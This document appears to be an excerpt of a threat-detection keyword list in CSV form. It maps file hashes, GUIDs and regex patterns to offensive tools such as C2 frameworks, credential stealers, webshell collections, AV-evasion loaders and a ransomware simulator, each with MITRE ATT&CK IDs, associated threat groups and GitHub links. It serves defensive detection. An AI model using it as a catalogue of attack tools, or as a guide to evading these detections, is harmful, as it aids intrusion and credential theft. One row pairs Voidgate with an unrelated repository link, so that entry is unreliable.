"*C??/generator.cpp*",".{0,1000}C\?\?\/generator\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","36630"
"*c001ef60b326a1b510e14111fc6f0d5639b47aa0d842e73f52935a9fffa794c5*",".{0,1000}c001ef60b326a1b510e14111fc6f0d5639b47aa0d842e73f52935a9fffa794c5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36631"
"*c0067d058ae4086ba276aa5d712782428fc0f72dff4cfb67f77c3d6ac08f9fb5*",".{0,1000}c0067d058ae4086ba276aa5d712782428fc0f72dff4cfb67f77c3d6ac08f9fb5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36632"
"*c00b3bbcd7cf59063dfc9eae66351a40c7be586e61156347b8c61a8627d6cb72*",".{0,1000}c00b3bbcd7cf59063dfc9eae66351a40c7be586e61156347b8c61a8627d6cb72.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","36633"
"*c00e8c409f1cb4e6e7e8bcea0a82212714f6d80cb961b2f8104c5df89059cc69*",".{0,1000}c00e8c409f1cb4e6e7e8bcea0a82212714f6d80cb961b2f8104c5df89059cc69.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36634"
"*c00ed94009fe6719c5c7803fe7d96a4930693897bc8335cb2c11d749052ffbdb*",".{0,1000}c00ed94009fe6719c5c7803fe7d96a4930693897bc8335cb2c11d749052ffbdb.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","36635"
"*c016717b991de5e956b84818eac0822ae860329a546c07f8ae4443d189f97522*",".{0,1000}c016717b991de5e956b84818eac0822ae860329a546c07f8ae4443d189f97522.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","36636"
"*c01fb08dabbd24b151fe5dfbb0742f7a*",".{0,1000}c01fb08dabbd24b151fe5dfbb0742f7a.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","36638"
"*c022454abb2dc5b52483870aa3a5c8c9e3da094780205735e927a17eaef7b351*",".{0,1000}c022454abb2dc5b52483870aa3a5c8c9e3da094780205735e927a17eaef7b351.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36639"
"*c02322e9bf5f1a0655cdaf316371f91257b9008d2ee6dde791bac5e8b2e5064d*",".{0,1000}c02322e9bf5f1a0655cdaf316371f91257b9008d2ee6dde791bac5e8b2e5064d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","36640"
"*c030cc4102e6bd16e8f55a5030a440f6ee5f411ad86b1c3af56b44e53cda14f6*",".{0,1000}c030cc4102e6bd16e8f55a5030a440f6ee5f411ad86b1c3af56b44e53cda14f6.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","#filehash","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","36642"
"*c034271dfb3dc754e0b24874fde53c0657087b3832f97c405d2a59f0fc4f8193*",".{0,1000}c034271dfb3dc754e0b24874fde53c0657087b3832f97c405d2a59f0fc4f8193.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","36644"
"*c0342fc8e521fa627bfce4988c83a081f394d5587fafe3fcd6765e028eca682c*",".{0,1000}c0342fc8e521fa627bfce4988c83a081f394d5587fafe3fcd6765e028eca682c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36645"
"*c0364bda334fc6450e71ddcd34eaace70089c2e6d69bdc324ffd144ac33c0c2d*",".{0,1000}c0364bda334fc6450e71ddcd34eaace70089c2e6d69bdc324ffd144ac33c0c2d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36647"
"*c0376b905f31c5d3440c2048498106aca7c86006fa9876ca85945d3a037705f5*",".{0,1000}c0376b905f31c5d3440c2048498106aca7c86006fa9876ca85945d3a037705f5.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","36648"
"*c03c789b4a4f2b16feb984d81f4c6a0ccbb74449f4402ec1df19be509d9314cc*",".{0,1000}c03c789b4a4f2b16feb984d81f4c6a0ccbb74449f4402ec1df19be509d9314cc.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","36650"
"*c03ef8106c58c8980b7859e0a8ee2363d70e2b7f1346356127c826faf2c0caa3*",".{0,1000}c03ef8106c58c8980b7859e0a8ee2363d70e2b7f1346356127c826faf2c0caa3.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","36651"
"*c042f360a6deff1b41405dd0f5bee637fc8242d585c714410084ef068a90d9fc*",".{0,1000}c042f360a6deff1b41405dd0f5bee637fc8242d585c714410084ef068a90d9fc.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","36652"
"*c0439525cf2087fbe8093cd85039fb5efe3557bc47a8a033a7b06657d4119333*",".{0,1000}c0439525cf2087fbe8093cd85039fb5efe3557bc47a8a033a7b06657d4119333.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36653"
"*c04b117bc1e5883c3c85ab2823071b33dbf1344e581e250fa5d80a8fae6b338b*",".{0,1000}c04b117bc1e5883c3c85ab2823071b33dbf1344e581e250fa5d80a8fae6b338b.{0,1000}","offensive_tool_keyword","ADFSDump-PS","ADFSDump to assist with GoldenSAML","T1078 - T1552.004 - T1558.004","TA0006 ","N/A","N/A","Credential Access","https://github.com/ZephrFish/ADFSDump-PS","1","0","#filehash","N/A","10","1","31","8","2024-05-20T00:00:19Z","2024-05-19T00:46:28Z","36655"
"*c04f37a9510f3a79f295522ec8783b68ae246657088b517bd4d1f4fd854905ab*",".{0,1000}c04f37a9510f3a79f295522ec8783b68ae246657088b517bd4d1f4fd854905ab.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","36656"
"*c05b0803f8793c6bef98a74b8950be5be30dcb0584e634355896230fb8ee19e1*",".{0,1000}c05b0803f8793c6bef98a74b8950be5be30dcb0584e634355896230fb8ee19e1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36657"
"*c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93*",".{0,1000}c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","36658"
"*c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93*",".{0,1000}c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","36659"
"*c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93*",".{0,1000}c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","36660"
"*c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93*",".{0,1000}c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","0","#filehash","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","36661"
"*c062b58a1151df4a0ebad3d9246f69342b0ac1ecf5e5a5c4116f292994c481bd*",".{0,1000}c062b58a1151df4a0ebad3d9246f69342b0ac1ecf5e5a5c4116f292994c481bd.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","#filehash","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","36662"
"*c06a0f5ccb8fa0b7aac6360b6ec7566dc06e5226ef1de0f7071a5404ae8d0c07*",".{0,1000}c06a0f5ccb8fa0b7aac6360b6ec7566dc06e5226ef1de0f7071a5404ae8d0c07.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36663"
"*c06bb3f0-cbdc-4384-84cf-21b7fe6dfe01*",".{0,1000}c06bb3f0\-cbdc\-4384\-84cf\-21b7fe6dfe01.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","0","#GUIDproject","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","36664"
"*c070900d71a49302a7c0db6f075b353e46fa8730050ad0e03054d9999a7bf00f*",".{0,1000}c070900d71a49302a7c0db6f075b353e46fa8730050ad0e03054d9999a7bf00f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","36665"
"*c070a38e1e877bdcfea1b389ed0089dc7b133acad33b2458cc1575ade877322f*",".{0,1000}c070a38e1e877bdcfea1b389ed0089dc7b133acad33b2458cc1575ade877322f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","36666"
"*c07272b6a537d203f886cd195e1ad2def64123c52c61a5d0652b26f1b288553d*",".{0,1000}c07272b6a537d203f886cd195e1ad2def64123c52c61a5d0652b26f1b288553d.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","36667"
"*c07d3356-7f9b-45e0-a4f7-7b1487d966b8*",".{0,1000}c07d3356\-7f9b\-45e0\-a4f7\-7b1487d966b8.{0,1000}","offensive_tool_keyword","1.6-C2","Using the Counter Strike 1.6 RCON protocol as a C2 Channel","T1071 - T1095 - T1572","TA0011 - TA0010","N/A","N/A","C2","https://github.com/eversinc33/1.6-C2","1","0","#GUIDproject","N/A","6","10","78","5","2025-02-19T15:34:37Z","2024-01-23T18:30:00Z","36668"
"*c0800f3267b958f1f1e3796d2462897b698406ffe2c95c09b6249e84ac753bb0*",".{0,1000}c0800f3267b958f1f1e3796d2462897b698406ffe2c95c09b6249e84ac753bb0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36669"
"*c0847034ecb624fde98700f4866d0a3fb799d3ff601ccd56df5bf31a9c065a53*",".{0,1000}c0847034ecb624fde98700f4866d0a3fb799d3ff601ccd56df5bf31a9c065a53.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","36670"
"*c086c1e601dbde7b31cbaea56b915f22b1ebc21d744a431984406e6062b4b865*",".{0,1000}c086c1e601dbde7b31cbaea56b915f22b1ebc21d744a431984406e6062b4b865.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","36671"
"*c08ba6e45d3859ecb3cd5df132fb04dcd86913afce15057de03bba9d256de4ef*",".{0,1000}c08ba6e45d3859ecb3cd5df132fb04dcd86913afce15057de03bba9d256de4ef.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","36672"
"*c08c8daee59d11347beda11ee23bfe120dc0503718bad492a5c09f17267848de*",".{0,1000}c08c8daee59d11347beda11ee23bfe120dc0503718bad492a5c09f17267848de.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36673"
"*c09008db98890127c9d7b2c86260bb670f7768c8310e61fc45707feee6afd25c*",".{0,1000}c09008db98890127c9d7b2c86260bb670f7768c8310e61fc45707feee6afd25c.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","36676"
"*c09373970ec5bbb6a3dfd02d13b233cf733501dbb92f3550f9168864087bec74*",".{0,1000}c09373970ec5bbb6a3dfd02d13b233cf733501dbb92f3550f9168864087bec74.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","36677"
"*c0a1ee50bf8984cf88c85740870b39f378187b877f728f0aebcc8d8aba03df73*",".{0,1000}c0a1ee50bf8984cf88c85740870b39f378187b877f728f0aebcc8d8aba03df73.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36679"
"*c0a7a797f39b509fd2d895b5731e79b57b350b85b20be5a51c0a1bda19321bd0*",".{0,1000}c0a7a797f39b509fd2d895b5731e79b57b350b85b20be5a51c0a1bda19321bd0.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#filehash","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","36680"
"*c0ac59bed2e0208db150069c4d943a73036d03271754075029bc2e41f24bb303*",".{0,1000}c0ac59bed2e0208db150069c4d943a73036d03271754075029bc2e41f24bb303.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","0","#filehash","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","36682"
"*c0bc9dc5055dc5d03e482e09afede681ccedea676c75958b22b85687f3a863a9*",".{0,1000}c0bc9dc5055dc5d03e482e09afede681ccedea676c75958b22b85687f3a863a9.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","36684"
"*c0c3027a8c08212af54ddfef22faf33a5cbee35c1d6ac2a44251d9e3dda42510*",".{0,1000}c0c3027a8c08212af54ddfef22faf33a5cbee35c1d6ac2a44251d9e3dda42510.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36686"
"*c0c309f54e29865152bf4ffacf5dd7084e33dd67ee139d33e27efd6628833813*",".{0,1000}c0c309f54e29865152bf4ffacf5dd7084e33dd67ee139d33e27efd6628833813.{0,1000}","offensive_tool_keyword","PowerProxy","PowerShell SOCKS proxy with reverse proxy capabilities","T1090.003 - T1059.001 - T1105","TA0011 - TA0005 - TA0008","N/A","Dispossessor","C2","https://github.com/get-get-get-get/PowerProxy","1","0","#filehash","N/A","10","10","80","10","2021-04-23T16:51:28Z","2020-01-03T18:18:58Z","36687"
"*c0cd3083f7015a42a6ceeaed3a49d889e899a1fb751fa952300e6f12669c0e4d*",".{0,1000}c0cd3083f7015a42a6ceeaed3a49d889e899a1fb751fa952300e6f12669c0e4d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","36689"
